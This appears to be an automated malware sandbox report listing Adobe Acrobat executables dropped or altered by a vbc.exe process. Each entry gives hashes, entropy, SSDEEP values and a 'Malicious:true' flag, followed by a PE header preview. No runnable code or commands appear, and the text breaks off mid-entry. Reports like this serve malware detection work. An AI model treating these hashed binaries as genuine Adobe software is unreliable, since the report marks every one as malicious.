                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1457664
                                                                                                                                                                    Entropy (8bit):5.082172819259051
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:0v7Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:gsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:6C07308E316755EF2F904FAC94E072C4
                                                                                                                                                                    SHA1:053E972835DD86264570523FD6A73D8CBAC0F4A7
                                                                                                                                                                    SHA-256:F60D282EEE5BEC127BD2079CCC012D8F82257DB276B7F11A0CFAA5249F7DAD54
                                                                                                                                                                    SHA-512:42E5617266506F221B93891C21E8A8D072ABD6B451086944A47B05DB5038549F6B40543DB408C83805B93816CB14612D498508753302B5F66D483E5D2D1CA1E0
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@....................................1/.... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1461248
                                                                                                                                                                    Entropy (8bit):5.468634443928687
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:N5zhM1XSEusqjnhMgeiCl7G0nehbGZpbD:ZMsTDmg27RnWGj
                                                                                                                                                                    MD5:63E3BB01C24D521F08D5DA84EA08A312
                                                                                                                                                                    SHA1:F3EF14F40B2074601D15C058635E4D5CC86D3EAA
                                                                                                                                                                    SHA-256:7101044AB67CD1DC8EFD7616AA3AA49BC6848135C3741271F2C0F98F971779F7
                                                                                                                                                                    SHA-512:3D7148B2E6E405F8C8E1D46F38A1A51C7DEE9A49ECB842BB9844FE8B84E288DA7DFD6B045EC6859A55F9010B7986762485C95B4C64FD65BA9378A6E73C275036
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@....................................g..... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4151808
                                                                                                                                                                    Entropy (8bit):6.499793724660495
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:WtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755xDmg27RN:WjEIa4HIEWOc53D527BWG
                                                                                                                                                                    MD5:C1CFD6FCB6BC32F36B8A34D8455966F7
                                                                                                                                                                    SHA1:CC643FF18B8AAD00C78BB8473BE6042595ECC53A
                                                                                                                                                                    SHA-256:5EFF6FE37DCCF2F917CB29B02FF67456757AF22F7297EF4E5A7584505730739C
                                                                                                                                                                    SHA-512:43732E9886F80EA8A6FDB51E72E6A563CF7066592572D045455196791A967627CC0857072A553DC64F0DE1262006AF889C0CE59C8FD71BC748870B8FD6AB76F0
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):59941376
                                                                                                                                                                    Entropy (8bit):7.99936732716747
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:1572864:1Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:uXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                    MD5:0F5D775032400655E05468EB739BFD85
                                                                                                                                                                    SHA1:ACCCBE98C43C093DAD1C8606B310369C229D08C6
                                                                                                                                                                    SHA-256:BC1BDE2CA96F84FF1FB9273C7E260F43A57889BC69476AB22150378CFF643376
                                                                                                                                                                    SHA-512:144CFEDB84E02ADA102747A2C3858A1E0989D5B60AEA6731524B8D69FB8341959944872959C22F1AC3037F54FDB9B02174B3AB28A85F76CEC3A2F59805C8ABDE
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1180160
                                                                                                                                                                    Entropy (8bit):5.08482970497558
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:IWrXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IesqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:9E03958E27E1732026CBEED075960B24
                                                                                                                                                                    SHA1:6B7760023F1B8743F4B325E03FF1B050FCE4C6A4
                                                                                                                                                                    SHA-256:AD0A15B95700272D32A87212E3FA3C78A073C74AB6FE5719040AC10DCAE32827
                                                                                                                                                                    SHA-512:276897A67D6F2A2B3CF15C2024A47F93781D682D767698F925BCCC82EA8D354DF445BBE631C3886FEE846FC21088253FA0A23574281C10090F3A16BCAAEBE893
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@......U..... .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6210048
                                                                                                                                                                    Entropy (8bit):6.386710599938762
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:+DvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXZ:fnN9KfxLk6GEQTX5UKzNDwD527BWG
                                                                                                                                                                    MD5:1BE7872FF97C30030EDED9D2499D40B9
                                                                                                                                                                    SHA1:95B7733967DF3979BBDF7B9696308B10E9F11CCE
                                                                                                                                                                    SHA-256:655B660929AAA79A41B9BB9F49C6E1BF25A1CF82482244955B6A287AA2AC6A3B
                                                                                                                                                                    SHA-512:D5408574811F99F3DD48171F9611028B95A570C4E35A24F505BAB5A2A7E61DF579370BCFF146ED38DEB2C62367F73D95E0FE3497A6F1A3328CAC5EE3DFE5A41B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......._... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1157120
                                                                                                                                                                    Entropy (8bit):5.04149745080951
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:emXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:emsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:548557C727CD0159FF5F05E3F749D478
                                                                                                                                                                    SHA1:24C286B001748E225BE90A9351283365C9BF6B4D
                                                                                                                                                                    SHA-256:9C3CDD2D7DCA17EB02D8487A962D8255D64C34AC67BEC19C6D1C7458329AE0EA
                                                                                                                                                                    SHA-512:014C34F5DC85FCBD4DBD1C14BA0D1C78B8EE2C00BE1F61AA6151BC9691454CB5CEB0CF8F743B248398467D7EB79679B41626BF50F989A76E88CEB9BB6EE6B113
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):12039168
                                                                                                                                                                    Entropy (8bit):6.596678752729291
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:7b+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKhD527BWG:HnPgTHIwZoRBk9DdhSUEVIXgKhVQBWG
                                                                                                                                                                    MD5:373B7B4556A367AAC3A716F31F4CE479
                                                                                                                                                                    SHA1:382EA343DA126977A496A27B9CAF6270B4821EB5
                                                                                                                                                                    SHA-256:234394D179326793214800F9A33A95C738738CF642D05EE049B483CF2DC8F26B
                                                                                                                                                                    SHA-512:A3F87118D0D047D80F93955AAC383119731ADBB738165CE87D270D66C35158F52EFDB5A22D6F3F8FA3BE88781B73F80E77BF797B142D15062CFC5ADD5B5B78FC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.....................................Z.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1322496
                                                                                                                                                                    Entropy (8bit):5.281833399741152
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:bg5FvCPusNsqjnhMgeiCl7G0nehbGZpbD:cftuDmg27RnWGj
                                                                                                                                                                    MD5:B3CBED321222BC877A0E348542133421
                                                                                                                                                                    SHA1:1A3B015F4E94C89B8D45E2A70340469082A5B0F2
                                                                                                                                                                    SHA-256:5EA8C5C9AB319B322D982FD3CD0AE0E4ADB636C1B3FB8FD65F1D02C1084DB30F
                                                                                                                                                                    SHA-512:C28CC1BEF3FC58650A64E3A4491B5110E47296904DD90DD86942A258D55DA4B34010090CF6019520B10B1700C550FFD4053DE0D6DADB547F96D066D94D6A0134
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p............ .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1339904
                                                                                                                                                                    Entropy (8bit):7.208906202543243
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:hjKTIsAjFuvtIfmFthMaT5U8aChaeunsqjnhMgeiCl7G0nehbGZpbD:hjIMmPh7TT79WDmg27RnWGj
                                                                                                                                                                    MD5:13E30782CCE9F8772DD9C1B4AFEDD0DF
                                                                                                                                                                    SHA1:6FB734E51429A4546ADE92C8ABBD566ADC0E59B1
                                                                                                                                                                    SHA-256:6B393886CE964F461C832ED8CFFEDFD70128068D68FF8F9659AC0FE4AFDC8F49
                                                                                                                                                                    SHA-512:A0D9436BA2A0EF22BCD4C6A2F4AB9DFC0F37A9C8917531A31413C88B97C69CC0F7F8B5B21374E6B3EED32AF67336FB15C86B1AE1D38244661447E21EFF4757B2
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$.......... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1515520
                                                                                                                                                                    Entropy (8bit):5.41180797664427
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:cGqVwCto1Gm5WgbsqjnhMgeiCl7G0nehbGZpbD:JZ1GmUgDmg27RnWGj
                                                                                                                                                                    MD5:BAA97B20E3E571C9DCF5407A6C9DC331
                                                                                                                                                                    SHA1:3C0D7A166C1FDB59A4D0941128EDF21FA0399700
                                                                                                                                                                    SHA-256:426B5655338E5B66FDE7C94E22C3ECE7E80A41B841E589DF635ECB020023BE26
                                                                                                                                                                    SHA-512:BCF0C628F8A3049D5ADDB366D03827F3204D4502E21EB3D965239261B29AAD288153B05D5557EC8EBE5C6FF444F3632310945798D04E8C665C3F813894B3DC12
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@....................................(|.... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1253376
                                                                                                                                                                    Entropy (8bit):5.157425664535493
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:qWBWHXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:qWBWHsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:A6E264A337B6BA85D755A97B42AF003E
                                                                                                                                                                    SHA1:461E94F58F3139A56FE2EB68D24ECBB9F9CBFF0D
                                                                                                                                                                    SHA-256:3F159BA91A53B6994ABEA847F1CFCA21CC5AFC97CFD24BBD622F961F68A9826F
                                                                                                                                                                    SHA-512:C9FE6E59F6F37E61EBCC5EFF019AFA5F3DB7C5E1109E6E31914733A45DFCFA688A5C0D508E8598EA48CD3A7E6C3E79246EAEB17404A7B6A6943AFA835114D94B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`............ .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1683968
                                                                                                                                                                    Entropy (8bit):7.228514679513595
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:if9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0wsqjnhMgeiCl7G0nehbGZpbD:i+GtCi27mVTyT+a0sDmg27RnWGj
                                                                                                                                                                    MD5:7D6044BD92538DDC6B31B55D3CA009C5
                                                                                                                                                                    SHA1:CD20085F8E5982B512BE7F90B70CA5A1FF796A6D
                                                                                                                                                                    SHA-256:AA160A636DBE57A82FC13620508C511DBD339C1669FB3F3179D184C14F2CB1DD
                                                                                                                                                                    SHA-512:CD69F63DA680EEBCE308940FEFC6E5F94629F6AEC14D05648512AA9E419ECBB58571AFD793212E0ECF68B92C8B427BBD91C8A17D47550DB10D1FA6D78F5A92B1
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.......................................... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3110912
                                                                                                                                                                    Entropy (8bit):6.649672264713212
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:yU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYXDmg27RnWGj:X2NfHOIK5Ns6qR91D527BWG
                                                                                                                                                                    MD5:4D5FFB7A9FE23C33018CCA6810AF0561
                                                                                                                                                                    SHA1:7589B87C5BAB7FD6B4B7F3039589AC6E5DD5D8D6
                                                                                                                                                                    SHA-256:DB69EB475BEFA1A0AACDD0CA5F2FA3FA931808EEA26D7A7B16A85609737D8936
                                                                                                                                                                    SHA-512:8D0B2165418451583EFC3CAE6512ED47026BFFEA94F8E1CF6DC26BE3C87F82F3FD39E06A9A1B0FFD2164814D8E2582D481C8571040820C78FE423E23F7347DA4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0.....X)0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1588224
                                                                                                                                                                    Entropy (8bit):5.531940031316267
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:jkcWTUQcydLsqjnhMgeiCl7G0nehbGZpbD:jhKUEDmg27RnWGj
                                                                                                                                                                    MD5:946FA159052E76E9E0CE72AFB76B6F7D
                                                                                                                                                                    SHA1:DAEAACDD08A4CB24CA07B6037C05F4ECE5B8CD17
                                                                                                                                                                    SHA-256:A553E8C8EDFEC9E53D5B61FFEB08517D62F8531622A61F6993D4522801E84A58
                                                                                                                                                                    SHA-512:925AE16AE39C1C8FD584E83892FA948E743F94E9F29FD22EAAF67AA75C714927616A09BF80B13A1ADA4C99BDC964EB413139DD0DBF4D41E75A349317EA3E3017
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@....................................:W.... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1338368
                                                                                                                                                                    Entropy (8bit):5.352680785641225
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:AfY+FUBAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:AA+qBAsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:DF1105E7A3F726CFB6C2BF8759A91988
                                                                                                                                                                    SHA1:B02FAC63B7CE2D6BF8AA500B6995D60796978D0B
                                                                                                                                                                    SHA-256:B03C393C668F4C5EF8EF9DBBC98CE1F283B07F23563EA988BD88FFD03E3C6A4F
                                                                                                                                                                    SHA-512:46D43C13A3A4245F831D0F29685570F0F3974BB4C35EDCB01B8A91F4085C8562B8B96DB96942090BBF2A156C4CF35DBA2C610EEDE4BA0936092958E13F4929CF
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@..................................6..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1143296
                                                                                                                                                                    Entropy (8bit):5.022690346177126
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:EXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:EsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:C018E1C19C4079A1D3984F7AD59E1979
                                                                                                                                                                    SHA1:32FC3D448A55804C640ABB59FA19838E0319215E
